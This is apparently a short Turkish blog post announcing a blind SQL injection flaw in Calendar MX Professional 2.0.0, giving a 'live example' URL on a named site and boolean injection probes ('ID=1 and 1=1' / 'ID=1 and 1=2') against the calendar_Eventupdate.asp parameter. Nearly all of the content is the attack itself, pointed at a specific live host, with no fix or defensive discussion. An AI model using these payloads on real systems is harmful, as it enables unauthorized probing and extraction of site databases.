Calendar MX Professional 2.0.0 Blind SQL Injection Güvenlik Açığı


Canlı Örnek:
http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}

Kullanımı:
calendar_Eventupdate.asp?ID=1 and 1=1
calendar_Eventupdate.asp?ID=1 and 1=2

Hiç yorum yok:

Yorum Gönder